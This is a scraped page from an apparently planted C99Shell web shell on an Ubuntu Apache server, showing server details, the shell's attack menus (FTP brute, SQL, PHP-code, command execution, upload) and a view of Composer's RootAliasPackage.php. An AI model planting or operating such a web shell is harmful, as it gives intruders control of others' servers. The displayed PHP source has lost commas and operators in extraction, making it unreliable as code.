!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/composer/composer/src/Composer/Package/   drwxr-xr-x
Free 13.21 GB of 57.97 GB (22.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RootAliasPackage.php (3.6 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of Composer.
 *
 * (c) Nils Adermann <naderman@naderman.de>
 *     Jordi Boggiano <j.boggiano@seld.be>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Composer\Package;

/**
 * @author Jordi Boggiano <j.boggiano@seld.be>
 */
class RootAliasPackage extends AliasPackage implements RootPackageInterface
{
    public function 
__construct(RootPackageInterface $aliasOf$version$prettyVersion)
    {
        
parent::__construct($aliasOf$version$prettyVersion);
    }

    
/**
     * {@inheritDoc}
     */
    
public function getAliases()
    {
        return 
$this->aliasOf->getAliases();
    }

    
/**
     * {@inheritDoc}
     */
    
public function getMinimumStability()
    {
        return 
$this->aliasOf->getMinimumStability();
    }

    
/**
     * {@inheritDoc}
     */
    
public function getStabilityFlags()
    {
        return 
$this->aliasOf->getStabilityFlags();
    }

    
/**
     * {@inheritDoc}
     */
    
public function getReferences()
    {
        return 
$this->aliasOf->getReferences();
    }

    
/**
     * {@inheritDoc}
     */
    
public function getPreferStable()
    {
        return 
$this->aliasOf->getPreferStable();
    }

    
/**
     * {@inheritDoc}
     */
    
public function getConfig()
    {
        return 
$this->aliasOf->getConfig();
    }

    
/**
     * {@inheritDoc}
     */
    
public function setRequires(array $require)
    {
        
$this->requires $this->replaceSelfVersionDependencies($requireLink::TYPE_REQUIRE);

        
$this->aliasOf->setRequires($require);
    }

    
/**
     * {@inheritDoc}
     */
    
public function setDevRequires(array $devRequire)
    {
        
$this->devRequires $this->replaceSelfVersionDependencies($devRequireLink::TYPE_DEV_REQUIRE);

        
$this->aliasOf->setDevRequires($devRequire);
    }

    
/**
     * {@inheritDoc}
     */
    
public function setConflicts(array $conflicts)
    {
        
$this->conflicts $this->replaceSelfVersionDependencies($conflictsLink::TYPE_CONFLICT);
        
$this->aliasOf->setConflicts($conflicts);
    }

    
/**
     * {@inheritDoc}
     */
    
public function setProvides(array $provides)
    {
        
$this->provides $this->replaceSelfVersionDependencies($providesLink::TYPE_PROVIDE);
        
$this->aliasOf->setProvides($provides);
    }

    
/**
     * {@inheritDoc}
     */
    
public function setReplaces(array $replaces)
    {
        
$this->replaces $this->replaceSelfVersionDependencies($replacesLink::TYPE_REPLACE);
        
$this->aliasOf->setReplaces($replaces);
    }

    
/**
     * {@inheritDoc}
     */
    
public function setRepositories($repositories)
    {
        
$this->aliasOf->setRepositories($repositories);
    }

    
/**
     * {@inheritDoc}
     */
    
public function setAutoload(array $autoload)
    {
        
$this->aliasOf->setAutoload($autoload);
    }

    
/**
     * {@inheritDoc}
     */
    
public function setDevAutoload(array $devAutoload)
    {
        
$this->aliasOf->setDevAutoload($devAutoload);
    }

    
/**
     * {@inheritDoc}
     */
    
public function setStabilityFlags(array $stabilityFlags)
    {
        
$this->aliasOf->setStabilityFlags($stabilityFlags);
    }

    
/**
     * {@inheritDoc}
     */
    
public function setSuggests(array $suggests)
    {
        
$this->aliasOf->setSuggests($suggests);
    }

    
/**
     * {@inheritDoc}
     */
    
public function setExtra(array $extra)
    {
        
$this->aliasOf->setExtra($extra);
    }

    public function 
__clone()
    {
        
parent::__clone();
        
$this->aliasOf = clone $this->aliasOf;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0053 ]--